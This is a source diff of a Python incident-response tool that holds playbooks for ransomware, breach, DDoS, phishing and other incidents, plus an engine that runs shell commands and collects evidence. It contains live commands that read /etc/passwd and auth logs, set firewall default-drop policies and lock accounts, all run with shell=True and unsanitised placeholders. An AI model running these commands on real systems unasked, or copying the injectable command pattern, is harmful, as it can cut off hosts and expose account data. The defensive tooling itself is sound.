Add firewall rules to block the host if remote.', + 'check_items': ['Disconnect from network', 'Disable WiFi adapters', 'Block at firewall', 'Disable shared drives/NFS mounts'], + 'automated': True, + 'commands': ['netsh interface set interface "Wi-Fi" disable' if _is_win else 'nmcli radio wifi off', + 'netsh advfirewall set allprofiles state on' if _is_win else 'iptables -P INPUT DROP && iptables -P OUTPUT DROP && iptables -P FORWARD DROP'], + }, + { + 'title': 'Preserve Evidence', + 'description': 'Capture volatile evidence before any remediation. Collect running processes, network connections, memory state, and ransom notes. Photograph any ransom screens.', + 'check_items': ['Capture process list', 'Capture network connections', 'Save ransom note text', 'Screenshot ransom screen', 'Record system time and timezone'], + 'automated': True, + 'commands': ['tasklist /v' if _is_win else 'ps auxf', + 'netstat -anob' if _is_win else 'ss -tulnp'], + }, + { + 'title': 'Identify Ransomware Variant', + 'description': 'Determine the ransomware family by examining the ransom note, encrypted file extensions, and behavior. Check ID Ransomware (id-ransomware.malwarehunterteam.com) and No More Ransom (nomoreransom.org) for known decryptors.', + 'check_items': ['Note encrypted file extension', 'Identify ransom note filename', 'Check ID Ransomware', 'Check No More Ransom project', 'Search threat intelligence feeds'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Assess Scope of Impact', + 'description': 'Determine which systems, shares, and data have been affected. Check backup integrity. 
Identify the initial infection vector (email attachment, RDP, exploit kit).', + 'check_items': ['Enumerate affected hosts', 'Check shared drive encryption status', 'Verify backup integrity', 'Identify infection vector', 'Determine data classification of affected files'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Eradicate Ransomware', + 'description': 'Remove the ransomware binary, persistence mechanisms, and any related malware. Scan all systems with updated AV signatures. Check scheduled tasks, startup items, and registry run keys.', + 'check_items': ['Identify and remove ransomware executable', 'Clear persistence mechanisms', 'Scan with updated AV signatures', 'Check scheduled tasks', 'Check registry run keys (Windows)', 'Check crontabs (Linux)'], + 'automated': True, + 'commands': ['schtasks /query /fo LIST /v' if _is_win else 'crontab -l 2>/dev/null; ls -la /etc/cron.*/ 2>/dev/null'], + }, + { + 'title': 'Restore and Recover', + 'description': 'Restore affected systems from clean backups. Rebuild compromised systems if needed. Verify restored data integrity and gradually reconnect to the network.', + 'check_items': ['Restore from verified clean backup', 'Rebuild if no clean backup available', 'Verify data integrity post-restore', 'Patch vulnerability used for initial access', 'Reconnect to network gradually'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Incident Review', + 'description': 'Conduct lessons learned meeting. Update IR playbook. Improve detection and prevention controls. 
Document full timeline for legal/compliance.', + 'check_items': ['Schedule lessons learned meeting', 'Update detection rules', 'Improve email filtering', 'Review backup strategy', 'Document full incident timeline', 'File regulatory notifications if required'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'data_breach': { + 'name': 'Data Breach Response', + 'steps': [ + { + 'title': 'Confirm and Scope the Breach', + 'description': 'Verify that a data breach has occurred. Determine what data was accessed or exfiltrated, which systems were involved, and the approximate timeframe.', + 'check_items': ['Verify breach indicators', 'Identify affected systems', 'Determine data types exposed', 'Establish breach timeframe', 'Check access logs for unauthorized activity'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:50 /f:text /rd:true' if _is_win else 'grep -i "authentication failure\\|invalid user\\|unauthorized" /var/log/auth.log 2>/dev/null | tail -50'], + }, + { + 'title': 'Contain the Breach', + 'description': 'Stop ongoing data exfiltration. Revoke compromised credentials, block attacker IPs, disable compromised accounts, and segment affected network areas.', + 'check_items': ['Block attacker IP addresses', 'Revoke compromised API keys/tokens', 'Disable compromised user accounts', 'Segment affected network zones', 'Enable enhanced logging'], + 'automated': True, + 'commands': ['netstat -anob' if _is_win else 'ss -tulnp', + 'net user' if _is_win else 'cat /etc/passwd | grep -v nologin | grep -v false'], + }, + { + 'title': 'Preserve Evidence', + 'description': 'Secure all evidence for potential legal proceedings. 
Create forensic images, preserve logs, and maintain chain of custody documentation.', + 'check_items': ['Create forensic disk images', 'Preserve all relevant logs', 'Document chain of custody', 'Capture network traffic logs', 'Save database query logs'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Assess Data Impact', + 'description': 'Classify the types and volume of data compromised. Determine if PII, PHI, financial data, or trade secrets were involved. Assess regulatory implications.', + 'check_items': ['Classify data types affected', 'Estimate number of records', 'Determine if PII/PHI involved', 'Check for financial data exposure', 'Identify regulatory frameworks triggered'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Notify Stakeholders', + 'description': 'Notify required parties according to regulatory requirements and company policy. This may include legal, management, affected individuals, and regulators.', + 'check_items': ['Notify legal counsel', 'Notify executive management', 'Prepare notification to affected individuals', 'File regulatory notifications (GDPR 72hr, HIPAA 60 days)', 'Notify law enforcement if appropriate', 'Prepare public statement if needed'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Remediate and Harden', + 'description': 'Fix the vulnerability or weakness that allowed the breach. Implement additional security controls and monitoring.', + 'check_items': ['Patch exploited vulnerability', 'Implement additional access controls', 'Enable MFA on affected systems', 'Deploy DLP controls', 'Enhance monitoring and alerting'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Incident Review', + 'description': 'Document full incident timeline, root cause analysis, and lessons learned. 
Update policies, procedures, and detection rules.', + 'check_items': ['Complete incident report', 'Conduct root cause analysis', 'Update incident response plan', 'Implement improved controls', 'Schedule follow-up review'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'insider_threat': { + 'name': 'Insider Threat Response', + 'steps': [ + { + 'title': 'Identify and Verify Threat', + 'description': 'Confirm the insider threat indicators. Determine if activity is malicious or accidental. Review user activity logs, access patterns, and data movement.', + 'check_items': ['Review user access logs', 'Check data transfer volumes', 'Verify anomalous login patterns', 'Review email/messaging for exfiltration', 'Confirm with HR if termination-related'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:100 /f:text /rd:true /q:"*[System[(EventID=4624 or EventID=4625)]]"' if _is_win else 'last -20 2>/dev/null; lastlog 2>/dev/null | head -20'], + }, + { + 'title': 'Monitor Covertly', + 'description': 'If investigation is underway, continue monitoring the insider without alerting them. Coordinate with legal and HR before taking action.', + 'check_items': ['Enable enhanced audit logging', 'Monitor file access patterns', 'Track network activity from user workstation', 'Coordinate with HR and legal', 'Document all observations'], + 'automated': True, + 'commands': ['auditpol /get /category:*' if _is_win else 'auditctl -l 2>/dev/null'], + }, + { + 'title': 'Contain the Threat', + 'description': 'When ready to act, disable the user account, revoke all access, and secure their workstation. 
Preserve all evidence before wiping anything.', + 'check_items': ['Disable user account', 'Revoke VPN/remote access', 'Revoke cloud service access', 'Secure physical workstation', 'Collect badges and keys', 'Disable email forwarding rules'], + 'automated': True, + 'commands': ['net user {username} /active:no' if _is_win else 'usermod -L {username} 2>/dev/null'], + }, + { + 'title': 'Forensic Investigation', + 'description': 'Conduct thorough forensic analysis of the insider\'s workstation, email, cloud storage, and all systems they had access to.', + 'check_items': ['Image workstation hard drive', 'Review email sent items and drafts', 'Check USB device history', 'Review cloud storage activity', 'Check print logs', 'Review source code repository commits'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Assess Damage', + 'description': 'Determine what data was accessed, copied, or destroyed. Assess intellectual property theft, competitive harm, and regulatory impact.', + 'check_items': ['Inventory accessed files', 'Determine data classification', 'Assess competitive damage', 'Check for data destruction', 'Review customer data exposure'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Recovery and Remediation', + 'description': 'Rotate credentials, revoke remaining access, and implement controls to prevent similar incidents.', + 'check_items': ['Rotate shared credentials', 'Review access control lists', 'Implement separation of duties', 'Update DLP policies', 'Enhance user behavior analytics'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'ddos': { + 'name': 'DDoS Response', + 'steps': [ + { + 'title': 'Detect and Classify Attack', + 'description': 'Identify the type of DDoS attack (volumetric, protocol, application layer). 
Determine attack vector, source IPs, and traffic patterns.', + 'check_items': ['Identify attack type', 'Measure attack bandwidth', 'Identify source IP ranges', 'Determine targeted services', 'Check if amplification/reflection attack'], + 'automated': True, + 'commands': ['netstat -an | find /c "ESTABLISHED"' if _is_win else 'ss -s; netstat -an 2>/dev/null | awk \'{print $5}\' | cut -d: -f1 | sort | uniq -c | sort -rn | head -20'], + }, + { + 'title': 'Activate Upstream Mitigation', + 'description': 'Contact ISP and activate DDoS mitigation services. Enable CDN/WAF protections. Activate cloud-based scrubbing if available.', + 'check_items': ['Contact ISP for upstream filtering', 'Activate CDN DDoS protection', 'Enable WAF rate limiting', 'Activate cloud scrubbing service', 'Implement geo-blocking if appropriate'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Apply Local Mitigations', + 'description': 'Implement local firewall rules to drop attack traffic. Enable SYN cookies, rate limiting, and connection limits. Block identified source IPs.', + 'check_items': ['Enable SYN flood protection', 'Apply rate limiting rules', 'Block top attacking IPs', 'Increase connection table size', 'Drop malformed packets'], + 'automated': True, + 'commands': ['netsh advfirewall firewall add rule name="DDoS-RateLimit" dir=in action=block enable=yes' if _is_win else 'sysctl -w net.ipv4.tcp_syncookies=1; sysctl -w net.ipv4.tcp_max_syn_backlog=2048'], + }, + { + 'title': 'Monitor and Adapt', + 'description': 'Continuously monitor attack patterns. Attackers often shift vectors when initial attack is mitigated. 
Update filtering rules as patterns change.', + 'check_items': ['Monitor bandwidth utilization', 'Track connection states', 'Watch for attack vector changes', 'Update filtering rules', 'Monitor service availability'], + 'automated': True, + 'commands': ['netstat -an' if _is_win else 'ss -s'], + }, + { + 'title': 'Service Recovery', + 'description': 'Once attack subsides, gradually restore services. Verify all systems are functioning normally. Clear any queued requests.', + 'check_items': ['Verify attack has stopped', 'Remove emergency firewall rules', 'Restart affected services', 'Clear connection queues', 'Verify service availability'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Attack Analysis', + 'description': 'Analyze attack traffic patterns for future prevention. Update DDoS response procedures. Consider additional protection services.', + 'check_items': ['Analyze attack traffic logs', 'Document attack timeline', 'Review effectiveness of mitigations', 'Update firewall rules permanently', 'Evaluate DDoS protection services'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'account_compromise': { + 'name': 'Account Compromise Response', + 'steps': [ + { + 'title': 'Confirm Compromise', + 'description': 'Verify that the account has been compromised. Check for unauthorized logins, unusual activity, email forwarding rules, and new MFA devices.', + 'check_items': ['Review login history for anomalies', 'Check for new email forwarding rules', 'Look for new MFA devices', 'Review recent account activity', 'Check for password change attempts'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:30 /f:text /rd:true /q:"*[System[(EventID=4624)]]"' if _is_win else 'last -30 2>/dev/null; grep "session opened" /var/log/auth.log 2>/dev/null | tail -30'], + }, + { + 'title': 'Secure the Account', + 'description': 'Reset the password immediately. Revoke all active sessions and tokens. Remove unauthorized MFA devices. 
Remove suspicious email rules.', + 'check_items': ['Reset account password', 'Revoke all active sessions', 'Remove unauthorized MFA devices', 'Remove email forwarding rules', 'Revoke OAuth application access'], + 'automated': True, + 'commands': ['net user {username} * /domain' if _is_win else 'passwd {username}'], + }, + { + 'title': 'Assess Impact', + 'description': 'Determine what the attacker accessed using the compromised account. Check email, files, systems, and any actions taken.', + 'check_items': ['Review email access logs', 'Check file access history', 'Review system authentication logs', 'Look for data exfiltration', 'Check for lateral movement'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Check for Lateral Movement', + 'description': 'Determine if the attacker used the compromised account to access other systems or escalate privileges.', + 'check_items': ['Check other systems for the compromised credential', 'Review admin console access', 'Look for privilege escalation', 'Check for new accounts created', 'Review VPN connection logs'], + 'automated': True, + 'commands': ['net user' if _is_win else 'cat /etc/passwd | grep -v nologin'], + }, + { + 'title': 'Remediate and Harden', + 'description': 'Implement additional security controls on the account and related systems.', + 'check_items': ['Enable MFA if not already active', 'Review account permissions', 'Implement conditional access policies', 'Update password policy', 'Enable login anomaly detection'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'malware': { + 'name': 'Malware Incident Response', + 'steps': [ + { + 'title': 'Identify and Isolate', + 'description': 'Identify the malware and isolate the affected system. Determine the malware type (trojan, worm, RAT, rootkit, etc.) 
and initial infection vector.', + 'check_items': ['Identify malware file/process', 'Isolate affected system from network', 'Determine malware type', 'Identify initial infection vector', 'Check if malware is actively communicating'], + 'automated': True, + 'commands': ['tasklist /v' if _is_win else 'ps auxf', + 'netstat -anob' if _is_win else 'ss -tulnp', + 'wmic process list full' if _is_win else 'ls -la /tmp /var/tmp /dev/shm 2>/dev/null'], + }, + { + 'title': 'Collect Malware Sample', + 'description': 'Safely collect the malware binary for analysis. Calculate hashes (MD5, SHA256) and check against threat intelligence databases.', + 'check_items': ['Copy malware sample to quarantine', 'Calculate file hashes', 'Submit to VirusTotal', 'Check threat intel feeds', 'Document file metadata'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Analyze Behavior', + 'description': 'Determine malware capabilities: C2 communication, persistence, data exfiltration, privilege escalation, and lateral movement.', + 'check_items': ['Identify C2 domains/IPs', 'Check persistence mechanisms', 'Identify data exfiltration channels', 'Check for privilege escalation', 'Look for dropper/downloader behavior'], + 'automated': True, + 'commands': ['schtasks /query /fo LIST /v' if _is_win else 'crontab -l 2>/dev/null', + 'reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run' if _is_win else 'systemctl list-unit-files --state=enabled 2>/dev/null'], + }, + { + 'title': 'Scope the Infection', + 'description': 'Determine if other systems are infected. Sweep the network for IOCs found during analysis.', + 'check_items': ['Sweep network for IOCs', 'Check DNS logs for C2 domains', 'Review network flow data', 'Check other endpoints for same hash', 'Look for worm propagation'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Eradicate Malware', + 'description': 'Remove all malware components from affected systems. 
Clean persistence mechanisms, remove dropped files, and clear modified registry entries.', + 'check_items': ['Remove malware binaries', 'Clear persistence entries', 'Remove dropped files', 'Clean registry modifications', 'Verify clean with multiple AV engines'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Recover and Monitor', + 'description': 'Restore system to clean state. Patch the vulnerability used for initial access. Monitor for reinfection.', + 'check_items': ['Restore from clean backup if needed', 'Apply security patches', 'Update AV signatures', 'Monitor for reinfection indicators', 'Update detection rules with new IOCs'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'phishing': { + 'name': 'Phishing Incident Response', + 'steps': [ + { + 'title': 'Analyze the Phishing Email', + 'description': 'Examine the phishing email headers, sender, links, and attachments. Determine the campaign scope and targets.', + 'check_items': ['Examine email headers for origin', 'Analyze URLs (do not click)', 'Check attachments in sandbox', 'Identify phishing kit or campaign', 'Determine number of recipients'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Identify Affected Users', + 'description': 'Determine which users received, opened, clicked links, or submitted credentials to the phishing page.', + 'check_items': ['Query email gateway for all recipients', 'Check proxy logs for phishing URL visits', 'Review web filter logs', 'Identify users who submitted credentials', 'Check for downloaded attachments'], + 'automated': True, + 'commands': ['ipconfig /displaydns' if _is_win else 'cat /etc/resolv.conf; grep -r "dns" /var/log/ 2>/dev/null | tail -20'], + }, + { + 'title': 'Contain the Threat', + 'description': 'Block the phishing URLs and sender addresses. Reset credentials for affected users. 
Purge remaining phishing emails from inboxes.', + 'check_items': ['Block phishing URL at proxy/firewall', 'Block sender email address', 'Reset passwords for affected users', 'Purge phishing email from all mailboxes', 'Block phishing domain in DNS'], + 'automated': True, + 'commands': ['netsh advfirewall firewall add rule name="Block-Phish" dir=out action=block remoteip={ip}' if _is_win else 'iptables -A OUTPUT -d {ip} -j DROP'], + }, + { + 'title': 'Check for Secondary Compromise', + 'description': 'If users clicked links or submitted credentials, check for follow-on compromise: unauthorized access, malware installation, data theft.', + 'check_items': ['Check for unauthorized logins with stolen creds', 'Scan workstations for malware', 'Review data access logs', 'Check for OAuth token theft', 'Look for lateral movement'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Remediate', + 'description': 'Ensure all affected accounts are secured. Update email filtering rules. Deploy additional protections.', + 'check_items': ['Verify all affected passwords reset', 'Enable MFA for affected accounts', 'Update email filter rules', 'Add phishing indicators to blocklists', 'Submit phishing page for takedown'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'User Awareness', + 'description': 'Notify users about the phishing campaign. Provide guidance on identifying phishing. Consider additional security awareness training.', + 'check_items': ['Send company-wide alert about campaign', 'Provide phishing identification tips', 'Schedule security awareness training', 'Update phishing simulation program', 'Document lessons learned'], + 'automated': False, + 'commands': [], + }, + ], + }, + 'unauthorized_access': { + 'name': 'Unauthorized Access Response', + 'steps': [ + { + 'title': 'Detect and Confirm', + 'description': 'Verify unauthorized access indicators. 
Review authentication logs, IDS/IPS alerts, and anomalous activity.', + 'check_items': ['Review authentication logs', 'Check IDS/IPS alerts', 'Verify anomalous access patterns', 'Identify accessed resources', 'Determine access method (exploit, stolen creds, misconfiguration)'], + 'automated': True, + 'commands': ['wevtutil qe Security /c:50 /f:text /rd:true' if _is_win else 'grep -i "accepted\\|failed\\|invalid" /var/log/auth.log 2>/dev/null | tail -50'], + }, + { + 'title': 'Block Attacker Access', + 'description': 'Immediately block the attacker\'s access. Firewall the source IP, disable exploited service, close the vulnerability.', + 'check_items': ['Block attacker IP at firewall', 'Disable exploited service', 'Close vulnerable ports', 'Revoke any created credentials', 'Reset compromised accounts'], + 'automated': True, + 'commands': ['netsh advfirewall firewall add rule name="Block-Attacker" dir=in action=block remoteip={ip}' if _is_win else 'iptables -A INPUT -s {ip} -j DROP'], + }, + { + 'title': 'Preserve Evidence', + 'description': 'Capture all evidence of the intrusion before remediation changes it.', + 'check_items': ['Capture running processes', 'Save network connections', 'Preserve log files', 'Save modified files list', 'Document access timeline'], + 'automated': True, + 'commands': ['tasklist /v' if _is_win else 'ps auxf', + 'netstat -anob' if _is_win else 'ss -tulnp', + 'dir /t:w /o:-d /s C:\\Users' if _is_win else 'find / -mtime -1 -type f 2>/dev/null | head -100'], + }, + { + 'title': 'Assess Scope and Impact', + 'description': 'Determine what the attacker accessed, modified, or exfiltrated. 
Check for backdoors, new accounts, and persistence mechanisms.', + 'check_items': ['Check for new user accounts', 'Look for backdoors and webshells', 'Review file modification times', 'Check for data exfiltration', 'Look for persistence mechanisms'], + 'automated': True, + 'commands': ['net user' if _is_win else 'cat /etc/passwd', + 'schtasks /query /fo LIST' if _is_win else 'crontab -l 2>/dev/null'], + }, + { + 'title': 'Eradicate and Harden', + 'description': 'Remove all attacker artifacts. Patch the exploited vulnerability. Harden the system against future attacks.', + 'check_items': ['Remove attacker backdoors', 'Patch exploited vulnerability', 'Remove unauthorized accounts', 'Harden service configurations', 'Update firewall rules', 'Enable enhanced logging'], + 'automated': False, + 'commands': [], + }, + { + 'title': 'Post-Incident Review', + 'description': 'Document the full attack chain. Update detection rules and security controls. Implement lessons learned.', + 'check_items': ['Document complete attack chain', 'Update IDS/IPS signatures', 'Review and update access controls', 'Implement additional monitoring', 'Schedule penetration test'], + 'automated': False, + 'commands': [], + }, + ], + }, +} + + +# ── Incident Response Engine ──────────────────────────────────────── + +class IncidentResponse: + """IR playbook runner, evidence collector, IOC sweeper, and reporting engine.""" + + _instance = None + + def __init__(self): + data_dir = get_data_dir() + if isinstance(data_dir, str): + data_dir = Path(data_dir) + self._incidents_dir = data_dir / 'incidents' + self._incidents_dir.mkdir(parents=True, exist_ok=True) + + # ── helpers ────────────────────────────────────────────────── + + def _run_cmd(self, cmd, timeout=30): + """Run a shell command, return (success, output).""" + try: + result = subprocess.run(cmd, shell=True, capture_output=True, + text=True, timeout=timeout) + return result.returncode == 0, result.stdout.strip() + except Exception as e: + 
return False, str(e) + + def _now_iso(self): + return datetime.now(timezone.utc).isoformat() + + def _gen_id(self): + """Generate a unique incident ID like IR-20260303-A1B2.""" + ts = datetime.now().strftime('%Y%m%d') + suffix = hashlib.md5(str(time.time()).encode()).hexdigest()[:4].upper() + return f'IR-{ts}-{suffix}' + + def _incident_dir(self, incident_id): + d = self._incidents_dir / incident_id + d.mkdir(parents=True, exist_ok=True) + return d + + def _load_incident(self, incident_id): + path = self._incident_dir(incident_id) / 'incident.json' + if not path.exists(): + return None + with open(path, 'r') as f: + return json.load(f) + + def _save_incident(self, incident): + idir = self._incident_dir(incident['id']) + with open(idir / 'incident.json', 'w') as f: + json.dump(incident, f, indent=2, default=str) + + def _load_timeline(self, incident_id): + path = self._incident_dir(incident_id) / 'timeline.json' + if not path.exists(): + return [] + with open(path, 'r') as f: + return json.load(f) + + def _save_timeline(self, incident_id, timeline): + path = self._incident_dir(incident_id) / 'timeline.json' + with open(path, 'w') as f: + json.dump(timeline, f, indent=2, default=str) + + def _evidence_dir(self, incident_id): + d = self._incident_dir(incident_id) / 'evidence' + d.mkdir(parents=True, exist_ok=True) + return d + + # ── CRUD ───────────────────────────────────────────────────── + + def create_incident(self, name, incident_type, severity, description=''): + """Create a new incident case and return the incident dict.""" + if incident_type not in INCIDENT_TYPES: + return {'error': f'Invalid type. Must be one of: {", ".join(INCIDENT_TYPES)}'} + if severity not in SEVERITY_LEVELS: + return {'error': f'Invalid severity. 
Must be one of: {", ".join(SEVERITY_LEVELS)}'} + + incident_id = self._gen_id() + playbook = IR_PLAYBOOKS.get(incident_type, {}) + step_count = len(playbook.get('steps', [])) + + incident = { + 'id': incident_id, + 'name': name, + 'type': incident_type, + 'severity': severity, + 'description': description, + 'status': 'open', + 'assignee': '', + 'notes': '', + 'created': self._now_iso(), + 'updated': self._now_iso(), + 'closed': None, + 'resolution_notes': '', + 'playbook_progress': [False] * step_count, + 'playbook_outputs': [''] * step_count, + 'evidence_count': 0, + } + self._save_incident(incident) + self._save_timeline(incident_id, []) + + # add creation event to timeline + self.add_timeline_event(incident_id, self._now_iso(), + f'Incident created: {name}', 'system', + f'Type: {incident_type}, Severity: {severity}') + return incident + + def get_incident(self, incident_id): + """Return full incident details including timeline and evidence list.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + incident['timeline'] = self._load_timeline(incident_id) + incident['evidence'] = self.list_evidence(incident_id) + return incident + + def list_incidents(self, status=None): + """Return list of all incidents, optionally filtered by status.""" + incidents = [] + if not self._incidents_dir.exists(): + return incidents + for d in sorted(self._incidents_dir.iterdir(), reverse=True): + if d.is_dir(): + inc = self._load_incident(d.name) + if inc: + if status and inc.get('status') != status: + continue + incidents.append(inc) + return incidents + + def update_incident(self, incident_id, updates): + """Update incident fields (status, severity, notes, assignee).""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + allowed = {'status', 'severity', 'notes', 'assignee', 'name', 'description'} + changes = [] + for key, val in updates.items(): + if key in allowed: + 
old_val = incident.get(key, '') + if old_val != val: + incident[key] = val + changes.append(f'{key}: {old_val} -> {val}') + + if 'status' in updates and updates['status'] not in STATUS_VALUES: + return {'error': f'Invalid status. Must be one of: {", ".join(STATUS_VALUES)}'} + if 'severity' in updates and updates['severity'] not in SEVERITY_LEVELS: + return {'error': f'Invalid severity. Must be one of: {", ".join(SEVERITY_LEVELS)}'} + + incident['updated'] = self._now_iso() + self._save_incident(incident) + + if changes: + self.add_timeline_event(incident_id, self._now_iso(), + 'Incident updated', 'system', + '; '.join(changes)) + return incident + + def close_incident(self, incident_id, resolution_notes=''): + """Close an incident with resolution notes.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + + incident['status'] = 'closed' + incident['closed'] = self._now_iso() + incident['updated'] = self._now_iso() + incident['resolution_notes'] = resolution_notes + self._save_incident(incident) + + self.add_timeline_event(incident_id, self._now_iso(), + 'Incident closed', 'system', resolution_notes) + return incident + + def delete_incident(self, incident_id): + """Delete an incident and all associated data.""" + idir = self._incidents_dir / incident_id + if not idir.exists(): + return {'error': 'Incident not found'} + shutil.rmtree(str(idir), ignore_errors=True) + return {'success': True, 'deleted': incident_id} + + # ── Playbooks ──────────────────────────────────────────────── + + def get_playbook(self, incident_type): + """Return the IR playbook for an incident type.""" + pb = IR_PLAYBOOKS.get(incident_type) + if not pb: + return {'error': f'No playbook for type: {incident_type}'} + return pb + + def run_playbook_step(self, incident_id, step_index, auto=False): + """Execute or mark a playbook step as done.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident 
not found'} + + playbook = IR_PLAYBOOKS.get(incident['type'], {}) + steps = playbook.get('steps', []) + if step_index < 0 or step_index >= len(steps): + return {'error': f'Invalid step index: {step_index}'} + + step = steps[step_index] + output = '' + + if auto and step.get('automated') and step.get('commands'): + # Run the commands and capture output + outputs = [] + for cmd in step['commands']: + success, result = self._run_cmd(cmd) + outputs.append(f'$ {cmd}\n{result}\n{"[OK]" if success else "[FAILED]"}') + output = '\n\n'.join(outputs) + + # Store the output as evidence + self.add_evidence(incident_id, + f'playbook_step_{step_index}_{step["title"].replace(" ", "_")}', + output, evidence_type='playbook_auto') + + # Mark step as complete + progress = incident.get('playbook_progress', []) + while len(progress) <= step_index: + progress.append(False) + progress[step_index] = True + + pb_outputs = incident.get('playbook_outputs', []) + while len(pb_outputs) <= step_index: + pb_outputs.append('') + pb_outputs[step_index] = output + + incident['playbook_progress'] = progress + incident['playbook_outputs'] = pb_outputs + incident['updated'] = self._now_iso() + + # auto-advance status + if incident['status'] == 'open': + incident['status'] = 'investigating' + + self._save_incident(incident) + self.add_timeline_event(incident_id, self._now_iso(), + f'Playbook step completed: {step["title"]}', + 'playbook', + f'Step {step_index + 1}/{len(steps)}, auto={auto}') + + return { + 'step_index': step_index, + 'title': step['title'], + 'completed': True, + 'auto': auto, + 'output': output, + 'progress': progress, + } + + # ── Evidence Collection ────────────────────────────────────── + + def collect_evidence(self, incident_id, evidence_type, source=None): + """Collect evidence from the local system and store it under the incident.""" + incident = self._load_incident(incident_id) + if not incident: + return {'error': 'Incident not found'} + if evidence_type not in EVIDENCE_TYPES: 
+ return {'error': f'Unknown evidence type. Options: {", ".join(EVIDENCE_TYPES)}'} + + content = '' + name = evidence_type + + if evidence_type == 'system_logs': + if _is_win: + _, content = self._run_cmd( + 'wevtutil qe System /c:50 /f:text /rd:true', timeout=20) + _, auth = self._run_cmd( + 'wevtutil qe Security /c:50 /f:text /rd:true', timeout=20) + content = f'=== System Log ===\n{content}\n\n=== Security Log ===\n{auth}' + else: + parts = [] + for log in ['/var/log/syslog', '/var/log/messages', '/var/log/auth.log', + '/var/log/secure', '/var/log/kern.log']: + _, out = self._run_cmd(f'tail -100 {log} 2>/dev/null') + if out: + parts.append(f'=== {log} ===\n{out}') + content = '\n\n'.join(parts) if parts else 'No accessible logs found' + + elif evidence_type == 'process_list': + if _is_win: + _, content = self._run_cmd('tasklist /v /fo csv', timeout=15) + else: + _, content = self._run_cmd('ps auxf', timeout=15) + + elif evidence_type == 'network_connections': + if _is_win: + _, content = self._run_cmd('netstat -anob', timeout=15) + else: + _, content = self._run_cmd('ss -tulnp 2>/dev/null || netstat -tulnp 2>/dev/null', timeout=15) + + elif evidence_type == 'running_services': + if _is_win: + _, content = self._run_cmd('sc query state= all', timeout=20) + else: + _, content = self._run_cmd('systemctl list-units --type=service --state=running 2>/dev/null || service --status-all 2>/dev/null', timeout=15) + + elif evidence_type == 'user_accounts': + if _is_win: + _, content = self._run_cmd('net user', timeout=10) + _, detailed = self._run_cmd('wmic useraccount list full', timeout=15) + content = f'{content}\n\n=== Detailed ===\n{detailed}' + else: + _, content = self._run_cmd('cat /etc/passwd; echo "---"; last -20 2>/dev/null', timeout=10) + + elif evidence_type == 'scheduled_tasks': + if _is_win: + _, content = self._run_cmd('schtasks /query /fo LIST /v', timeout=20) + else: + parts = [] + _, out = self._run_cmd('crontab -l 2>/dev/null') + if out: + 
parts.append(f'=== User Crontab ===\n{out}') + _, out = self._run_cmd('ls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/ /etc/cron.weekly/ /etc/cron.monthly/ 2>/dev/null') + if out: + parts.append(f'=== System Cron ===\n{out}') + _, out = self._run_cmd('systemctl list-timers --all 2>/dev/null') + if out: + parts.append(f'=== Systemd Timers ===\n{out}') + content = '\n\n'.join(parts) if parts else 'No scheduled tasks found' + + elif evidence_type == 'recent_files': + if _is_win: + _, content = self._run_cmd( + 'forfiles /P C:\\Users /S /D -1 /C "cmd /c echo @path @fdate @ftime" 2>nul', + timeout=30) + if not content: + _, content = self._run_cmd('dir /t:w /o:-d /s C:\\Users\\*.*', timeout=30) + else: + _, content = self._run_cmd( + 'find /home /tmp /var/tmp /root -mtime -1 -type f 2>/dev/null | head -200', + timeout=30) + + elif evidence_type == 'memory_info': + if _is_win: + _, content = self._run_cmd( + 'systeminfo | findstr /C:"Total Physical" /C:"Available Physical" /C:"Virtual Memory"', + timeout=15) + _, procs = self._run_cmd( + 'wmic process get Name,WorkingSetSize,ProcessId /format:csv', timeout=15) + content = f'{content}\n\n=== Top Processes ===\n{procs}' + else: + _, content = self._run_cmd('free -h; echo "---"; cat /proc/meminfo | head -20', timeout=10) + + elif evidence_type == 'disk_info': + if _is_win: + _, content = self._run_cmd('wmic logicaldisk get size,freespace,caption', timeout=10) + else: + _, content = self._run_cmd('df -h; echo "---"; lsblk 2>/dev/null', timeout=10) + + elif evidence_type == 'installed_software': + if _is_win: + _, content = self._run_cmd( + 'wmic product get name,version /format:csv 2>nul', timeout=30) + if not content: + _, content = self._run_cmd( + 'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall" /s /v DisplayName 2>nul', + timeout=20) + else: + _, content = self._run_cmd( + 'dpkg -l 2>/dev/null || rpm -qa 2>/dev/null || pacman -Q 2>/dev/null', + timeout=20) + + # Save evidence + return 
 self.add_evidence(incident_id, name, content, evidence_type='collected')
+
+    def add_evidence(self, incident_id, name, content, evidence_type='manual'):
+        """Add evidence (manual note, collected data, etc.) to an incident."""
+        incident = self._load_incident(incident_id)
+        if not incident:
+            return {'error': 'Incident not found'}
+
